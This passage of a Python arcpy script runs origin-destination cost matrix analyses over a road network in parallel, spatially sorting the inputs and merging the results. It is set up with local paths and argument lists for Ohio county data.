For example, to process destinations with object id between 101 and 200,\r\n pass (101, 200)\r\n\r\n \"\"\"\r\n # Set the workspace that will contains input and output NA classes used by OD Cost Matrix solver\r\n arcpy.env.workspace = self.od_workspace\r\n\r\n # Determine if we need to use the network dataset layer pointing to a local network dataset or a portal url as\r\n # our network data source. For a local network dataset, we also need to checkout the network analyst extension\r\n # license.\r\n if self.is_service:\r\n network_data_source = self.network_data_source\r\n else:\r\n network_data_source = self.nds_layer_name\r\n arcpy.CheckOutExtension(\"network\")\r\n\r\n # Create a new OD cost matrix layer\r\n self.logger.debug(\"Creating OD Cost Matrix object\")\r\n od_solver = arcpy.nax.OriginDestinationCostMatrix(network_data_source)\r\n # Solver object attributes that can be adjusted to suit\r\n # Change to set different distance units for the output OD matrix distance values\r\n od_solver.distanceUnits = arcpy.nax.DistanceUnits.Feet\r\n od_solver.allowSaveLayerFile = True\r\n # Travel mode requires both distance and time to be set\r\n od_solver.travelMode = self.travel_mode\r\n od_solver.defaultDestinationCount = self.target_count\r\n od_solver.defaultImpedanceCutoff = self.cutoff\r\n od_solver.accumulateAttributeNames = [self.time_attribute, self.distance_attribute]\r\n # No geometry is store which significantly increase speed\r\n if self.OD_LINE_SHAPE == \"NO_LINES\":\r\n od_solver.lineShapeType = arcpy.nax.LineShapeType.NoLine\r\n else:\r\n od_solver.lineShapeType = arcpy.nax.LineShapeType.StraightLine\r\n # self.SEARCH_TOL constant set to 5 Miles from original 20000 meters\r\n search_tol, search_tol_units = self.SEARCH_TOL.split()\r\n od_solver.searchTolerance = float(search_tol)\r\n od_solver.searchToleranceUnits = arcpy.nax.DistanceUnits[search_tol_units]\r\n\r\n # Select the origins and destinations to process\r\n self._select_inputs(origins_criteria, destinations_criteria)\r\n\r\n # Map the ObjectID field from input origin to the Name field on the origins sub layer and the ObjectID field\r\n # from input destinations to the Name field on the destinations sub layer. 
Map the network locations fields\r\n # using field mappings.\r\n origins_field_mappings = od_solver.fieldMappings(arcpy.nax.OriginDestinationCostMatrixInputDataType.Origins,\r\n True)\r\n # origins_field_mappings[\"Name\"].mappedFieldName = self.origins_oid_field_name\r\n origins_field_mappings[\"Name\"].mappedFieldName = self.origins_name_field_name\r\n destinations_field_mappings = od_solver.fieldMappings(\r\n arcpy.nax.OriginDestinationCostMatrixInputDataType.Destinations, # noqa pylint:disable=line-too-long\r\n True)\r\n # destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_oid_field_name\r\n destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_name_field_name\r\n\r\n # Load the origins and destinations using the field mappings and a search tolerance of 20000 Meters.\r\n self.logger.debug(\"Loading origins and destinations\")\r\n od_solver.load(arcpy.nax.OriginDestinationCostMatrixInputDataType.Origins, self.input_origins_layer,\r\n origins_field_mappings, False)\r\n od_solver.load(arcpy.nax.OriginDestinationCostMatrixInputDataType.Destinations, self.input_destinations_layer,\r\n destinations_field_mappings, False)\r\n\r\n # Solve the OD cost matrix layer\r\n self.logger.debug(\"Solving OD cost matrix\")\r\n solve_start = time.time()\r\n solve_result = od_solver.solve()\r\n solve_end = time.time()\r\n solve_msgs = \"\\n\".join([msg[-1] for msg in solve_result.solverMessages(arcpy.nax.MessageSeverity.All)])\r\n self.job_result[\"solveMessages\"] = solve_msgs\r\n if not solve_result.solveSucceeded:\r\n return\r\n self.job_result[\"solveSucceeded\"] = True\r\n self.logger.debug(\"Solving OD cost matrix completed in %s (seconds)\", round(solve_end - solve_start, 3))\r\n lyr_file = os.path.join(self.job_folder, \"result_{}.lyr\".format(self.job_id))\r\n self.job_result[\"outputLayerFile\"] = lyr_file\r\n solve_result.saveAsLayerFile(lyr_file)\r\n\r\n # Export the ODlines as output feature class\r\n output_od_lines = os.path.join(self.od_workspace, \"output_od_lines\")\r\n solve_result.export(arcpy.nax.OriginDestinationCostMatrixOutputDataType.Lines, output_od_lines)\r\n self.job_result[\"outputLines\"] = output_od_lines\r\n\r\n def _select_inputs(self, origins_criteria, destinations_criteria):\r\n \"\"\"Select origins and destinations to process.\"\"\"\r\n # Select the origins and destinations to process\r\n origins_where_clause = \"{} >= {} And {} <= {}\".format(self.origins_oid_field_name, origins_criteria[0],\r\n self.origins_oid_field_name, origins_criteria[1])\r\n arcpy.management.MakeFeatureLayer(self.origins, self.input_origins_layer, origins_where_clause)\r\n if self.cutoff:\r\n # select destinations within the cutoff from origins\r\n arcpy.management.MakeFeatureLayer(self.destinations, self.input_destinations_layer)\r\n cutoff = self.cutoff * self.MINUTES_TO_MILES if self.is_travel_mode_time_based else self.cutoff\r\n result = arcpy.management.SelectLayerByLocation(self.input_destinations_layer, \"WITHIN_A_DISTANCE_GEODESIC\",\r\n self.input_origins_layer, \"{} Miles\".format(cutoff), )\r\n # If no destinations are within the cutoff, skip this iteration\r\n if not result.getOutput(0).getSelectionSet():\r\n msg = \"No destinations found within the cutoff\"\r\n self.logger.warning(msg)\r\n self.job_result[\"solveMessages\"] = msg\r\n return\r\n else:\r\n\r\n destinations_where_clause = \"{} >= {} And {} <= {}\".format(self.destinations_oid_field_name,\r\n destinations_criteria[0],\r\n self.destinations_oid_field_name,\r\n 
destinations_criteria[1])\r\n arcpy.management.MakeFeatureLayer(self.destinations, self.input_destinations_layer,\r\n destinations_where_clause)\r\n\r\n def _get_travel_mode_info(self):\r\n \"\"\"Get additional info from the travel mode.\"\"\"\r\n # When working with services, get the travel modes defined in the portal\r\n if self.is_service:\r\n # travel_modes = self._get_portal_travel_modes()\r\n travel_modes = arcpy.na.GetTravelModes(self.network_data_source)\r\n else:\r\n travel_modes = arcpy.na.GetTravelModes(self.nds_layer_name)\r\n travel_mode = travel_modes[self.travel_mode]\r\n impedance = travel_mode.impedance\r\n self.time_attribute = travel_mode.timeAttributeName\r\n self.distance_attribute = travel_mode.distanceAttributeName\r\n self.is_travel_mode_time_based = True if self.time_attribute == impedance else False\r\n\r\n def _make_nds_layer(self):\r\n \"\"\"Create a network dataset layer if one does not exist.\"\"\"\r\n # Can only create a layer for a local network dataset\r\n if self.is_service:\r\n return\r\n if arcpy.Exists(self.nds_layer_name):\r\n self.logger.debug(\"Using existing network dataset layer: %s\", self.nds_layer_name)\r\n else:\r\n self.logger.debug(\"Creating network dataset layer\")\r\n arcpy.na.MakeNetworkDatasetLayer(self.network_data_source, self.nds_layer_name)\r\n\r\n def _transfer_oids_using_join(self):\r\n \"\"\"Transfer OIDs from origins and destinations sub layers to OD lines sub layer using attribute joins.\"\"\"\r\n # Add an attribute index to the OD lines feature class\r\n arcpy.management.AddIndex(self.lines_sublayer, \"OriginID\", \"OriginID\", \"NON_UNIQUE\", \"NON_ASCENDING\")\r\n arcpy.management.AddIndex(self.lines_sublayer, \"DestinationID\", \"DestinationID\", \"NON_UNIQUE\", \"NON_ASCENDING\")\r\n # Use the JoinField tool to transfer OD Cost Matrix information to the output feature class\r\n # Transfer the OriginOID from the input Origins to the output Lines\r\n arcpy.management.JoinField(self.lines_sublayer, \"OriginID\", self.origins_sublayer, \"ObjectID\",\r\n self.ORIGINS_OID_FIELD_NAME)\r\n # Transfer the DestinationOID field from the input Destinations to the output Lines\r\n arcpy.management.JoinField(self.lines_sublayer, \"DestinationID\", self.destinations_sublayer, \"ObjectID\",\r\n self.DESTINATIONS_OID_FIELD_NAME)\r\n\r\n def _transfer_oids(self):\r\n \"\"\"Calculate OIDs from name field.\"\"\"\r\n # Add OID fields\r\n arcpy.management.AddFields(self.lines_sublayer, [[self.ORIGINS_OID_FIELD_NAME, \"LONG\"],\r\n [self.DESTINATIONS_OID_FIELD_NAME, \"LONG\"]])\r\n # Calculate OID fields from the Name field\r\n with arcpy.da.UpdateCursor(self.lines_sublayer, (\"Name\", # pylint:disable = no-member\r\n self.ORIGINS_OID_FIELD_NAME,\r\n self.DESTINATIONS_OID_FIELD_NAME)) as cursor:\r\n for row in cursor:\r\n row[1], row[2] = map(int, row[0].split(\"-\"))\r\n cursor.updateRow(row)\r\n\r\n def _export_od_lines(self):\r\n \"\"\"Export OD lines to an output feature class.\r\n\r\n Returns:\r\n The full catalog path of the output feature class.\r\n\r\n \"\"\"\r\n self.logger.debug(\"Exporting OD lines\")\r\n travel_time_field_name = \"Total_{}\".format(self.time_attribute)\r\n travel_distance_field_name = \"Total_{}\".format(self.distance_attribute)\r\n fields_to_copy = (self.ORIGINS_OID_FIELD_NAME, self.DESTINATIONS_OID_FIELD_NAME, \"DestinationRank\",\r\n travel_time_field_name, travel_distance_field_name)\r\n field_mappings = arcpy.FieldMappings()\r\n for field in fields_to_copy:\r\n field_map = arcpy.FieldMap()\r\n 
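            # Note: FieldMap.outputField returns a copy of the Field object, so the
            # renames below only take effect because the modified copy is assigned
            # back to field_map.outputField.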
field_map.addInputField(self.lines_sublayer, field)\r\n if field == travel_time_field_name:\r\n output_field = field_map.outputField\r\n output_field.name = \"Total_Time\"\r\n output_field.aliasName = \"Total Time\"\r\n field_map.outputField = output_field\r\n elif field == travel_distance_field_name:\r\n output_field = field_map.outputField\r\n output_field.name = \"Total_Distance\"\r\n output_field.aliasName = \"Total Distance\"\r\n field_map.outputField = output_field\r\n else:\r\n pass\r\n field_mappings.addFieldMap(field_map)\r\n\r\n result = arcpy.conversion.FeatureClassToFeatureClass(self.lines_sublayer, self.od_workspace, \"output_od_lines\",\r\n field_mapping=field_mappings)\r\n self.logger.debug(\"Exporting OD lines %s\", result.getMessages().split(\"\\n\")[-1])\r\n return result.getOutput(0)\r\n\r\n @staticmethod\r\n def get_nds_search_criteria(network_data_source): # pylint:disable = too-many-locals\r\n \"\"\"Return the search criteria for a network dataset that can be used with Calculate Locations GP tool.\r\n\r\n Args:\r\n network_data_source: The catalog path to the network dataset\r\n Returns:\r\n The search criteria for the netrwork dataset.\r\n\r\n \"\"\"\r\n # Determine if a network source defines subtypes. The search criteria needs to be specified for each subtype\r\n # using the following pattern [\"SourceName : subtype description\", \"SHAPE\"]\r\n tmp_search_criteria = []\r\n search_criteria = []\r\n nds_desc = arcpy.Describe(network_data_source)\r\n nds_fds_path = os.path.dirname(nds_desc.catalogPath)\r\n for src in nds_desc.sources:\r\n src_element_type = src.elementType\r\n if src_element_type not in (\"Edge\", \"Junction\"):\r\n continue\r\n src_name = src.name\r\n src_path = os.path.join(nds_fds_path, src_name)\r\n src_desc = arcpy.Describe(src_path)\r\n if src_desc.subTypeFieldName:\r\n # Get the description of subtype codes\r\n src_sub_types = arcpy.da.ListSubtypes(src_path) # pylint:disable = no-member\r\n for code in src_sub_types:\r\n sub_type_description = src_sub_types[code][\"Name\"]\r\n tmp_search_criteria.append([u\"{} : {}\".format(src_name, sub_type_description), src_element_type])\r\n else:\r\n tmp_search_criteria.append([src_name, src_element_type])\r\n # Set shape type for all edge sources to be SHAPE and NONE for all junction sources\r\n for criteria in tmp_search_criteria:\r\n shape_type = \"SHAPE\" if criteria[-1] == \"Edge\" else \"NONE\"\r\n search_criteria.append([criteria[0], shape_type])\r\n return search_criteria\r\n\r\n @staticmethod\r\n def preprocess_inputs(input_features, network_data_source, travel_mode, output_workspace):\r\n \"\"\"Preprocess input features so that they can be processed in chunks.\r\n\r\n The function performs tasks such as spatially sorting input features and calculate network locations for the\r\n features.\r\n\r\n Args:\r\n input_features: The full catalog path to the input feature class.\r\n network_data_source: The catalog path to the network dataset used for analysis\r\n travel_mode: Name of the travel mode used for the analysis.\r\n output_workspace: The catalog path of the output workspace in which to write the output feature class.\r\n Returns:\r\n The full catalog path of the processed feature class.\r\n\r\n \"\"\"\r\n logger.info(\"Preprocessing %s\", input_features)\r\n # Create output features in a feature class with the same name as input feature class.\r\n desc_input_features = arcpy.Describe(input_features)\r\n input_path = desc_input_features.catalogPath\r\n output_features = 
arcpy.CreateUniqueName(os.path.basename(input_path), output_workspace)\r\n\r\n # Spatially sort input features\r\n logger.debug(\"Spatially sorting %s\", input_features)\r\n result = arcpy.management.Sort(input_features, output_features,\r\n [[desc_input_features.shapeFieldName, \"ASCENDING\"]], \"PEANO\")\r\n logger.debug(result.getMessages().split(\"\\n\")[-1])\r\n # Calculate network location fields if network data source is local\r\n if not ODCostMatrix.is_nds_service(network_data_source):\r\n logger.debug(\"Calculating network locations for %s\", input_features)\r\n result = arcpy.na.CalculateLocations(output_features, network_data_source, \"20 Miles\",\r\n ODCostMatrix.get_nds_search_criteria(network_data_source),\r\n travel_mode=travel_mode)\r\n logger.debug(result.getMessages().split(\"\\n\")[-1])\r\n\r\n return output_features\r\n\r\n @staticmethod\r\n def get_oid_ranges(origins_count, destinations_count, max_od_size):\r\n \"\"\"Return an iterable of OIDs ranges for origins and destinations.\r\n\r\n Args:\r\n origins_count: Total number of origins.\r\n destinations_count: Total number of destinations.\r\n max_od_size: The maximum number of od lines that should be present in a single od cost matrix. This number\r\n governs how many origins and destinations are processed in one iteration. For example, if you\r\n have 500 origins and 100 destinations and maximum od size is 10,000, then each iteration will\r\n process 100 origins and 100 destinations.\r\n Returns:\r\n An iterable where each element is a tuple containing lower and upper bound OIDs for origins and\r\n destinations to process in each iteration. For example get_oid_ranges(200, 100, 10000) will return an\r\n iterable such as [((1, 100), (1, 100)), ((101, 200), (1, 100))]\r\n\r\n \"\"\"\r\n od_ranges = []\r\n if destinations_count <= max_od_size:\r\n max_origins = max_od_size // destinations_count\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n od_ranges = ((val, (1, destinations_count)) for val in origin_ranges)\r\n else:\r\n max_destinations = destinations_count - max_od_size\r\n max_origins = max_od_size // max_destinations\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n dest_ranges = itertools.zip_longest(range(1, destinations_count + 1, max_destinations),\r\n range(max_destinations, destinations_count + 1, max_destinations),\r\n fillvalue=destinations_count)\r\n od_ranges = itertools.product(origin_ranges, dest_ranges)\r\n return od_ranges\r\n\r\n @staticmethod\r\n def get_oid_ranges_agol(origins_count, destinations_count, max_origins, max_destinations):\r\n \"\"\"Return an iterable of OIDs ranges for origins and destinations based on max origins and max destinations.\r\n\r\n Args:\r\n origins_count: Total number of origins.\r\n destinations_count: Total number of destinations.\r\n max_origins: The maximum number of origins supported by the agol od service.\r\n max_destinations: The maximum number of destinations supported by the agol od service.\r\n Returns:\r\n An iterable where each element is a tuple containing lower and upper bound OIDs for origins and\r\n destinations to process in each iteration. 
For example get_oid_ranges_agol(1500, 1200, 1000, 1000) will\r\n return an iterable such as [((1, 1000), (1, 1000)), ((1, 1000), (1001, 1200)),\r\n ((1001, 1500), (1, 1000)), ((1001, 1500), (1001, 1200))]\r\n\r\n \"\"\"\r\n od_ranges = []\r\n if destinations_count <= max_destinations:\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n od_ranges = ((val, (1, destinations_count)) for val in origin_ranges)\r\n else:\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n dest_ranges = itertools.zip_longest(range(1, destinations_count + 1, max_destinations),\r\n range(max_destinations, destinations_count + 1, max_destinations),\r\n fillvalue=destinations_count)\r\n od_ranges = itertools.product(origin_ranges, dest_ranges)\r\n return od_ranges\r\n\r\n @staticmethod\r\n def setup_logger(logger_obj):\r\n \"\"\"Set up the logger used for logging messages.\r\n\r\n Args:\r\n logger_obj: The logger instance.\r\n\r\n \"\"\"\r\n logger_obj.setLevel(logging.DEBUG)\r\n # logger_obj.propagate = False\r\n if len(logger_obj.handlers) <= 1:\r\n console_handler = logging.StreamHandler()\r\n console_formatter = logging.Formatter(\"%(process)d | %(message)s\")\r\n console_handler.setFormatter(console_formatter)\r\n console_handler.setLevel(logging.DEBUG)\r\n logger_obj.addHandler(console_handler)\r\n\r\n @staticmethod\r\n def is_nds_service(network_data_source):\r\n \"\"\"Return true if the network data source points to a service.\"\"\"\r\n return True if network_data_source.startswith(\"http\") else False\r\n\r\n @staticmethod\r\n def get_service_toolbox(routing_utils_url):\r\n \"\"\"Return the remote toolbox for a portal utility service.\r\n\r\n Args:\r\n routing_utils_url: The URL of the routing utilities service configured with the portal.\r\n Returns:\r\n A named tuple representing a remote toolbox. 
The toolbox property of the named tuple can be used with\r\n arcpy.ImportToolbox.\r\n Raises:\r\n A ValueError if the utility service is not configured\r\n\r\n \"\"\"\r\n RemoteToolInfo = namedtuple(\"RemoteToolInfo\", (\"service_name\", \"toolbox\")) # pylint: disable=invalid-name\r\n\r\n # Get the service name, folder name and SOAP URL for the utility service.\r\n folder_url, service_name = os.path.split(os.path.dirname(routing_utils_url))\r\n rest_url, folder_name = os.path.split(folder_url)\r\n soap_url = rest_url.replace(\"/rest/\", \"/\")\r\n\r\n tbx = f\"{soap_url};{folder_name}/{service_name};UseSSOIdentityIfPortalOwned\"\r\n return RemoteToolInfo(service_name, tbx)\r\n\r\n @staticmethod\r\n def get_tool_limits(portal_url, service_name=\"asyncODCostMatrix\",\r\n tool_name=\"GenerateOriginDestinationCostMatrix\"):\r\n \"\"\"Return a dictionary of various limits supported by a portal tool.\r\n\r\n Args:\r\n portal_url: The URL of the active portal that is used as the network dataset source.\r\n service_name: The name of the utility service configured with the portal to perform a given analysis.\r\n tool_name: The name of the tool within the service that performs the analysis.\r\n Returns:\r\n A dictionary with key as limit name and value as limit value.\r\n\r\n \"\"\"\r\n if not portal_url.endswith(\"/\"):\r\n portal_url = portal_url + \"/\"\r\n tool_limits = arcpy.na.GetWebToolInfo(service_name, tool_name, portal_url)\r\n return tool_limits[\"serviceLimits\"]\r\n\r\n\r\ndef solve_od_cost_matrix(inputs, chunk):\r\n \"\"\"Solve OD cost matrix on a separate process for each iteration.\r\n\r\n Args:\r\n inputs: An iterable of dictionaries containing the inputs such as origins and destinations to process for each\r\n iteration.\r\n chunk: An iterable of OID ranges for origins and destinations defining the origins and destinations that will be\r\n processed in each iteration.\r\n Returns:\r\n A dictionary which contains information about the result. 
The dictionary has the following keys:\r\n \"jobId\" -- A unique ID\r\n \"jobFolder\" -- Folder that stores intermidiate results\r\n \"solveSucceeded\" -- Status of the OD cost matrix solve\r\n \"solveMessages\" -- Messages from the OD cost matrix solve\r\n \"outputLines\" -- Catalog path to the feature class storing output OD cost matrix lines\r\n \"outputLayerFile\" -- Catalog path to the layer file for OD cost matrix solve\r\n\r\n \"\"\"\r\n odcm = ODCostMatrix(**inputs)\r\n logger.info(\"Processing origins OID %s to %s and destinations OID %s to %s as job id %s\",\r\n chunk[0][0], chunk[0][1], chunk[1][0], chunk[1][1], odcm.job_id)\r\n odcm.solve(chunk[0], chunk[1])\r\n result = odcm.job_result\r\n logger.debug(\"Saved OD lines at %s\", result[\"outputLines\"])\r\n return result\r\n\r\n\r\ndef main(**inputs): # pylint:disable = too-many-locals, too-many-statements, too-many-branches\r\n \"\"\"Preprocess inputs, compute OD cost matrix and postprocess outputs.\"\"\"\r\n # Create the output workspace\r\n out_gdb_name = \"outputs\"\r\n out_gdb = os.path.join(inputs[\"output_folder\"], out_gdb_name + \".gdb\")\r\n if not os.path.exists(out_gdb):\r\n arcpy.management.CreateFileGDB(inputs[\"output_folder\"], out_gdb_name)\r\n\r\n # Preprocess inputs\r\n pp_origins = ODCostMatrix.preprocess_inputs(inputs[\"origins\"], inputs[\"network_data_source\"], inputs[\"travel_mode\"],\r\n out_gdb)\r\n pp_destinations = ODCostMatrix.preprocess_inputs(inputs[\"destinations\"], inputs[\"network_data_source\"],\r\n inputs[\"travel_mode\"], out_gdb)\r\n\r\n inputs[\"origins\"] = pp_origins\r\n inputs[\"destinations\"] = pp_destinations\r\n\r\n # Store count of input origins and destinations\r\n origins_count = int(arcpy.management.GetCount(inputs[\"origins\"]).getOutput(0))\r\n destinations_count = int(arcpy.management.GetCount(inputs[\"destinations\"]).getOutput(0))\r\n\r\n # Determine if working with online or enterprise portal\r\n network_data_source = inputs[\"network_data_source\"]\r\n is_agol = False\r\n portal_desc = {}\r\n if ODCostMatrix.is_nds_service(network_data_source):\r\n logger.debug(\"Getting information from the portal\")\r\n portal_desc = arcpy.GetPortalDescription(network_data_source)\r\n inputs[\"portal_description\"] = portal_desc\r\n is_agol = not portal_desc[\"isPortal\"]\r\n\r\n # Get iterables for the inputs\r\n if is_agol:\r\n # Get the max origins and max destinations if working with AGOL\r\n tool_limits = ODCostMatrix.get_tool_limits(network_data_source)\r\n max_origins = int(tool_limits[\"maximumOrigins\"])\r\n max_destinations = int(tool_limits[\"maximumDestinations\"])\r\n # Chunk origin and destination OID ranges based on max origins and max destinations\r\n ranges = ODCostMatrix.get_oid_ranges_agol(origins_count, destinations_count, max_origins, max_destinations)\r\n # Adjust properties specific to working with AGOL service.\r\n inputs[\"workers\"] = min(4, inputs[\"workers\"])\r\n inputs[\"max_od_size\"] = max_origins * max_destinations\r\n else:\r\n ranges = ODCostMatrix.get_oid_ranges(origins_count, destinations_count, inputs[\"max_od_size\"])\r\n\r\n inputs_iter = itertools.repeat(inputs)\r\n\r\n # Compute OD cost matrix\r\n od_line_fcs = []\r\n job_folders_to_delete = []\r\n # Run on multiple processes when solving large ODs\r\n if origins_count * destinations_count > inputs[\"max_od_size\"]:\r\n with futures.ProcessPoolExecutor(max_workers=inputs[\"workers\"]) as executors:\r\n results = executors.map(solve_od_cost_matrix, inputs_iter, ranges)\r\n # Compute a list of 
od results from each iteration if the solve is successful.\r\n for result in results:\r\n if result[\"solveSucceeded\"]:\r\n od_line_fcs.append(result[\"outputLines\"])\r\n job_folders_to_delete.append(result[\"jobFolder\"])\r\n else:\r\n logger.warning(\"Solve failed for job id %s\", result[\"jobId\"])\r\n logger.debug(result[\"solveMessages\"])\r\n else:\r\n result = solve_od_cost_matrix(inputs, [(1, origins_count), (1, destinations_count)])\r\n if result[\"solveSucceeded\"]:\r\n od_line_fcs.append(result[\"outputLines\"])\r\n job_folders_to_delete.append(result[\"jobFolder\"])\r\n else:\r\n logger.warning(\"Solve failed for job id %s\", result[\"jobId\"])\r\n logger.debug(result[\"solveMessages\"])\r\n\r\n # Merge individual OD matrix feature classes into a single feature class\r\n if od_line_fcs:\r\n output_od_name = \"od_\" + pp_origins[-7:-2]\r\n output_fc = arcpy.CreateUniqueName(output_od_name, out_gdb)\r\n logger.info(\"Merging results to %s\", output_fc)\r\n result = arcpy.management.Merge(od_line_fcs, output_fc)\r\n logger.debug(result.getMessages().split(\"\\n\")[-1])\r\n\r\n # Cleanup\r\n # Delete the job folders if the job succeeded\r\n for folder in job_folders_to_delete:\r\n logger.debug(\"Deleting %s\", folder)\r\n shutil.rmtree(folder, ignore_errors=True)\r\n\r\n # Delete the preprocessed inputs\r\n arcpy.management.Delete(pp_origins)\r\n arcpy.management.Delete(pp_destinations)\r\n\r\n\r\ndef _cli():\r\n # Changed the Command Line Interface code to use a list of dictionaries that are then iterated\r\n # This allows for\r\n \"\"\"Command line interface for the tool.\r\n # Create the parser\r\n parser = argparse.ArgumentParser(description=globals().get(\"__doc__\", \"\"), fromfile_prefix_chars='@')\r\n\r\n # Define Arguments supported by the command line utility\r\n\r\n # --origins parameter\r\n help_string = \"The full catalog path to the feature class containing the origins.\"\r\n parser.add_argument(\"-o\", \"--origins\", action=\"store\", dest=\"origins\", help=help_string, required=True)\r\n\r\n # --destinations parameter\r\n help_string = \"The full catalog path to the feature class containing the destinations.\"\r\n parser.add_argument(\"-d\", \"--destinations\", action=\"store\", dest=\"destinations\", help=help_string, required=True)\r\n\r\n # --network-data-source parameter\r\n help_string = \"The full catalog path to the network dataset or a portal url that will be used for the analysis.\"\r\n parser.add_argument(\"-n\", \"--network-data-source\", action=\"store\", dest=\"network_data_source\", help=help_string,\r\n required=True)\r\n\r\n # --travel-mode parameter\r\n help_string = (\"The name of the travel mode from the network data source that should be used for the analysis. \"\r\n 'If the travel mode name has spaces, enclose the name in double quotes such as \"Driving Time\"')\r\n parser.add_argument(\"-t\", \"--travel-mode\", action=\"store\", dest=\"travel_mode\", help=help_string, required=True)\r\n\r\n # --output-folder parameter\r\n help_string = \"The full catalog path to an existing folder where the tool will create the outputs.\"\r\n parser.add_argument(\"-f\", \"--folder\", action=\"store\", dest=\"output_folder\", help=help_string, required=True)\r\n\r\n # --cutoff parameter\r\n help_string = (\"The impedance value at which to stop searching for destinations for a given origin in the units of\"\r\n \" the impedance attribute used by your chosen travel mode. 
By default no cutoff is used.\")\r\n parser.add_argument(\"-c\", \"--cutoff\", action=\"store\", type=float, dest=\"cutoff\", help=help_string, default=0)\r\n\r\n # --target-count parameter\r\n help_string = (\"The number of destinations to find per origin. By default, no limit is used, and all destinations\"\r\n \" are found.\")\r\n parser.add_argument(\"-T\", \"--target-count\", action=\"store\", type=int, dest=\"target_count\", help=help_string,\r\n default=0)\r\n\r\n # --workers parameter\r\n help_string = (\"The number of parallel process to use for the analysis. The default is 2. When solving against a \"\r\n \"local network dataset, this number should be set equal to the number of physical CPU cores on your \"\r\n \"machine to achieve maximum performance. When solving against a service, this number should be set \"\r\n \"equal to the number of instances available for the service.\")\r\n parser.add_argument(\"-w\", \"--workers\", action=\"store\", type=int, dest=\"workers\", help=help_string, default=2)\r\n\r\n # --max-od-size parameter\r\n max_od_size = 5000000\r\n help_string = (f\"The maximum number of rows that should be present in a single od cost matrix feature class. \"\r\n \"This number governs how many origins and destinations are processed in one iteration. \"\r\n \"For example, if you have 500 origins and 100 destinations and maximum od size is 10,000, \"\r\n \"each iteration will process 100 origins and 100 destinations. The default is {max_od_size}\")\r\n parser.add_argument(\"-m\", \"--max-od-size\", action=\"store\", type=int, dest=\"max_od_size\", help=help_string,\r\n default=max_od_size)\r\n \"\"\"\r\n # import OhioCountyODArgsDictionary39111 as arg\r\n # import OhioCountyODArgsDictionary39061 as arg\r\n import OhioCountyODArgsDictionary39111 as arg\r\n\r\n # Get arguments as dictionary.\r\n # args = vars(parser.parse_args())\r\n\r\n # argslist = [\r\n # {'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39001_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39001_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000},\r\n # {\r\n # 'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39003_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39003_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000},\r\n # {\r\n # 'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39005_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39005_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 
'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000},\r\n # {\r\n # 'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39007_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39007_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000}\r\n # ]\r\n\r\n\r\n for args in arg.argslist:\r\n # Convert cutoff and target_count to None if they are not specified.\r\n cutoff = args[\"cutoff\"]\r\n target_count = args[\"target_count\"]\r\n args[\"cutoff\"] = cutoff if cutoff else None\r\n args[\"target_count\"] = target_count if target_count else None\r\n\r\n # setup the module logger\r\n ODCostMatrix.setup_logger(logger)\r\n\r\n # call the main execution\r\n start_time = time.time()\r\n 